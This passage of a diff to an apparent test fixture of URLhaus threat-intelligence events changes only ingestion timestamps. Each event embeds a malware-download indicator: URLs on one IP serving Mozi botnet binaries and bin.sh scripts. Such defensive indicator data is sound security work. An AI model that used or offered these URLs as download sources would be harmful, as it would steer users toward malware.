@@ -17100,7 +17100,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027021200Z", + "ingested": "2021-12-14T14:56:15.726545437Z", "original": "{\"id\":\"961194\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961194/\",\"url\":\"http://89.160.20.156:33163/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17149,7 +17149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027028100Z", + "ingested": "2021-12-14T14:56:15.726545804Z", "original": "{\"id\":\"961195\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961195/\",\"url\":\"http://89.160.20.156:48557/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17199,7 +17199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027069900Z", + "ingested": "2021-12-14T14:56:15.726546176Z", "original": "{\"id\":\"961192\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961192/\",\"url\":\"http://89.160.20.156:59976/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:31:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -17248,7 +17248,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027077900Z", + "ingested": "2021-12-14T14:56:15.726546550Z", "original": "{\"id\":\"961191\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961191/\",\"url\":\"http://89.160.20.156:48291/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -17297,7 +17297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027085Z", + "ingested": "2021-12-14T14:56:15.726547006Z", "original": "{\"id\":\"961190\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961190/\",\"url\":\"http://89.160.20.156:45797/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17347,7 +17347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027092Z", + "ingested": "2021-12-14T14:56:15.726547375Z", "original": "{\"id\":\"961186\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961186/\",\"url\":\"http://89.160.20.156:43741/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -17396,7 +17396,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027099Z", + "ingested": "2021-12-14T14:56:15.726547746Z", "original": "{\"id\":\"961187\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961187/\",\"url\":\"http://89.160.20.156:35446/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17445,7 +17445,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027105800Z", + "ingested": "2021-12-14T14:56:15.726548112Z", "original": "{\"id\":\"961188\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961188/\",\"url\":\"http://89.160.20.156:35720/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17494,7 +17494,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027112700Z", + "ingested": "2021-12-14T14:56:15.726548549Z", "original": "{\"id\":\"961189\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961189/\",\"url\":\"http://89.160.20.156:50501/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -17543,7 +17543,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027119500Z", + "ingested": "2021-12-14T14:56:15.726549073Z", "original": "{\"id\":\"961185\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961185/\",\"url\":\"http://89.160.20.156:55796/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17592,7 +17592,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027126500Z", + "ingested": "2021-12-14T14:56:15.726549443Z", "original": "{\"id\":\"961183\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961183/\",\"url\":\"http://89.160.20.156:52308/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17641,7 +17641,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027133400Z", + "ingested": "2021-12-14T14:56:15.726549809Z", "original": "{\"id\":\"961184\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961184/\",\"url\":\"http://89.160.20.156:59154/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -17690,7 +17690,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027140400Z", + "ingested": "2021-12-14T14:56:15.726550177Z", "original": "{\"id\":\"961177\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961177/\",\"url\":\"http://89.160.20.156:57950/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17739,7 +17739,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027147900Z", + "ingested": "2021-12-14T14:56:15.726551159Z", "original": "{\"id\":\"961178\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961178/\",\"url\":\"http://89.160.20.156:33520/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17788,7 +17788,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027155100Z", + "ingested": "2021-12-14T14:56:15.726551586Z", "original": "{\"id\":\"961179\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961179/\",\"url\":\"http://89.160.20.156:45525/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -17837,7 +17837,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027162Z", + "ingested": "2021-12-14T14:56:15.726552105Z", "original": "{\"id\":\"961180\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961180/\",\"url\":\"http://89.160.20.156:38430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17886,7 +17886,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027168900Z", + "ingested": "2021-12-14T14:56:15.726552469Z", "original": "{\"id\":\"961181\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961181/\",\"url\":\"http://89.160.20.156:4096/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -17935,7 +17935,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027175900Z", + "ingested": "2021-12-14T14:56:15.726552965Z", "original": "{\"id\":\"961182\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961182/\",\"url\":\"http://89.160.20.156:50631/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -17984,7 +17984,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027182900Z", + "ingested": "2021-12-14T14:56:15.726553337Z", "original": "{\"id\":\"961176\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961176/\",\"url\":\"http://89.160.20.156:37989/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18033,7 +18033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027189900Z", + "ingested": "2021-12-14T14:56:15.726553737Z", "original": "{\"id\":\"961175\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961175/\",\"url\":\"http://89.160.20.156:54078/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:20:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18082,7 +18082,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027196800Z", + "ingested": "2021-12-14T14:56:15.726554192Z", "original": "{\"id\":\"961173\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961173/\",\"url\":\"http://89.160.20.156:34201/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -18131,7 +18131,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027203700Z", + "ingested": "2021-12-14T14:56:15.726554555Z", "original": "{\"id\":\"961174\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961174/\",\"url\":\"http://89.160.20.156:56573/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18181,7 +18181,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027210800Z", + "ingested": "2021-12-14T14:56:15.726554922Z", "original": "{\"id\":\"961172\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961172/\",\"url\":\"http://89.160.20.156:48291/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:08:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -18230,7 +18230,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027217800Z", + "ingested": "2021-12-14T14:56:15.726555288Z", "original": "{\"id\":\"961170\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961170/\",\"url\":\"http://89.160.20.156:60102/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -18279,7 +18279,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027224800Z", + "ingested": "2021-12-14T14:56:15.726555755Z", "original": "{\"id\":\"961171\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961171/\",\"url\":\"http://89.160.20.156:52225/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18328,7 +18328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027231700Z", + "ingested": "2021-12-14T14:56:15.726556192Z", "original": "{\"id\":\"961167\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961167/\",\"url\":\"http://89.160.20.156:56733/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18377,7 +18377,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027238600Z", + "ingested": "2021-12-14T14:56:15.726556648Z", "original": "{\"id\":\"961168\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961168/\",\"url\":\"http://89.160.20.156:57042/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -18426,7 +18426,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027245500Z", + "ingested": "2021-12-14T14:56:15.726557015Z", "original": "{\"id\":\"961169\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961169/\",\"url\":\"http://89.160.20.156:38035/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18475,7 +18475,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027252500Z", + "ingested": "2021-12-14T14:56:15.726557381Z", "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://89.160.20.156:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18524,7 +18524,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027259400Z", + "ingested": "2021-12-14T14:56:15.726557814Z", "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://89.160.20.156:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -18573,7 +18573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027266400Z", + "ingested": "2021-12-14T14:56:15.726558185Z", "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://89.160.20.156:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18622,7 +18622,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027273200Z", + "ingested": "2021-12-14T14:56:15.726558578Z", "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://89.160.20.156:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18670,7 +18670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027280100Z", + "ingested": "2021-12-14T14:56:15.726558941Z", "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://89.160.20.156:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -18718,7 +18718,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027287100Z", + "ingested": "2021-12-14T14:56:15.726559393Z", "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://89.160.20.156:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18766,7 +18766,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027294Z", + "ingested": "2021-12-14T14:56:15.726559814Z", "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://89.160.20.156:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18814,7 +18814,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027300900Z", + "ingested": "2021-12-14T14:56:15.726560184Z", "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://89.160.20.156:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -18862,7 +18862,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027307900Z", + "ingested": "2021-12-14T14:56:15.726560552Z", "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://89.160.20.156:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18910,7 +18910,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027314900Z", + "ingested": "2021-12-14T14:56:15.726560919Z", "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://89.160.20.156:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -18959,7 +18959,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027321800Z", + "ingested": "2021-12-14T14:56:15.726561403Z", "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://89.160.20.156:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -19007,7 +19007,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027328700Z", + "ingested": "2021-12-14T14:56:15.726561781Z", "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://89.160.20.156:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19055,7 +19055,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027336Z", + "ingested": "2021-12-14T14:56:15.726562151Z", "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://89.160.20.156:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19104,7 +19104,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027343Z", + "ingested": "2021-12-14T14:56:15.726562518Z", "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://89.160.20.156:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -19152,7 +19152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027349900Z", + "ingested": "2021-12-14T14:56:15.726562892Z", "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://89.160.20.156:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19200,7 +19200,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027356800Z", + "ingested": "2021-12-14T14:56:15.726563316Z", "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://89.160.20.156:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19249,7 +19249,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027364Z", + "ingested": "2021-12-14T14:56:15.726563680Z", "original": 